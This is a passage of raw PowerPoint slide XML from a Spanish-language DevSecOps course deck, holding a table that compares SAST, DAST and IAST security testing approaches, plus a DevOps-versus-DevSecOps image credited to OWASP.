                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EA74F6-F47E-A26D-5AAF-9C3B0E61CAFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9455457" y="29921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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabla 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9646E436-00EA-F576-DABD-1EA8D400A84B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3961081312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547578" y="1508014"/>
          <a:ext cx="8875864" cy="431824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537410">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="315090195"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2109355">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="500503853"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2098964">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3963310215"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2130135">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="53569628"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="668080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="es-ES" sz="16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s-ES" sz="16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70873908"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="452704">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="es-ES" sz="16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b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Static</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B06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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dynamic </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B06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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Interactive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B06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7960784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="668080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Analiza código fuente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ES" sz="16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7295138"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="668080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ejecuta la aplicación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9775845"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="668080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Informa del segmento de código donde hay vulnerabilidad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dirty="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876846"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="668080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Falsos positivos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dirty="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3817066"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6" descr="Imagen que contiene Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB1BF5C-56F4-9C27-2CE7-8C06018C1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7469" y="3047672"/>
            <a:ext cx="477193" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flecha: hacia arriba 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4462E1FF-56AE-8CD0-1F9E-4EF4590F5688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4897469" y="5245954"/>
            <a:ext cx="356644" cy="423169"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">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rebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9161E4E5-4ADA-9227-7C3C-985FEFD1D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982" y="3740681"/>
            <a:ext cx="495786" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9" descr="Imagen que contiene Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7848CCC3-23D3-1B90-B2A8-B89345A9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982" y="4433690"/>
            <a:ext cx="477193" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10" descr="Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF008EB-C577-FF9C-7EF1-DADD72E3A3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3226" y="3047672"/>
            <a:ext cx="495786" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11" descr="Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A30692-B59F-A28D-E6FF-B440893A94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3226" y="4533716"/>
            <a:ext cx="495786" cy="495786"/>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991BADC9-0A9B-ACB3-D96F-0D0CB2C17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226" y="3753709"/>
            <a:ext cx="477193" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22" descr="Imagen que contiene Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBFC59CD-1FDE-D172-C46E-6F97A2EECB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664" y="3047672"/>
            <a:ext cx="477193" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Imagen 39" descr="Imagen que contiene Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB9E51D5-9435-6D50-4E0D-62100522F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663" y="3720876"/>
            <a:ext cx="477193" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Imagen 40" descr="Imagen que contiene Forma&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A76B0B9-B849-814C-1D3E-B60374BE7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663" y="4468025"/>
            <a:ext cx="477193" cy="495786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Flecha: hacia arriba 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2482C211-A750-A405-D7D8-608308F280F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7023500" y="5239753"/>
            <a:ext cx="356644" cy="423169"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">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rebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Flecha: hacia arriba 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2D4A0F-7EC9-6B11-1A81-B9CCD83B666D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9190937" y="5239752"/>
            <a:ext cx="356644" cy="423169"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">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rebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F616F039-A4ED-30DC-F444-AAAE8A94BF1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776972" y="1515930"/>
            <a:ext cx="718185" cy="718185"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C3156F-498A-709F-5013-922A3A56580B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884939" y="1521345"/>
            <a:ext cx="718185" cy="718185"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468AAF69-0C6A-2981-F339-1047EA24C9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9010166" y="1514053"/>
            <a:ext cx="718185" cy="718185"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="CuadroTexto 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9D0235-B826-DABD-52A7-07C30CE76103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841164" y="1736686"/>
            <a:ext cx="1469538" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="CuadroTexto 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C85895-7FDB-D9EE-EEBF-EAA98176F176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936874" y="1719256"/>
            <a:ext cx="1469538" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="CuadroTexto 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D5672B0-CA11-8F7D-8604-B03E0588113B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9090942" y="1732441"/>
            <a:ext cx="1469538" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IAST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAEFEEED-467E-EAB2-75F4-516459B91A9C}"/>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9220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F70E7830-D3AC-A515-6ED5-C502E94B4F50}"/>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58F7E657-C551-47A6-A08F-3B8F8358D0A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5384373"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3CD1C1A-AD93-0494-681B-A1AD40457C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5907024" y="2703486"/>
            <a:ext cx="6217920" cy="2616101"/>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5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEGURIDAD APLICADA A PROCEDIMIENTOS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="193330"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D70E29-DE3E-C27C-BCC7-4FDBD92DB26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFA935E-0626-2AAB-CE1E-91F6CD8647D2}"/>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279361" y="88094"/>
            <a:ext cx="2231136" cy="871728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3293964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6C68-C36D-7106-005C-853A19D6E1F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2BB50D2-9C0C-6179-66CB-3DA7BA8F61DE}"/>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019F476-74DD-657F-5305-7D0569BDCA6F}"/>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7A102D9F-9772-DC54-45B3-97AF8D52512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4" descr="DevOps vs DevSecOps.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86514A7F-CCB2-2AF9-97D7-6078EFA03D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 r="46131" b="9835"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1982830" y="1367522"/>
            <a:ext cx="8226339" cy="3971832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="3 Marcador de texto">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B244A3-8E7A-00A1-E72D-60B7002EC902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4248181" y="5411377"/>
            <a:ext cx="3566021" cy="390136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="5A8DB8"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fuente: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OWASP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
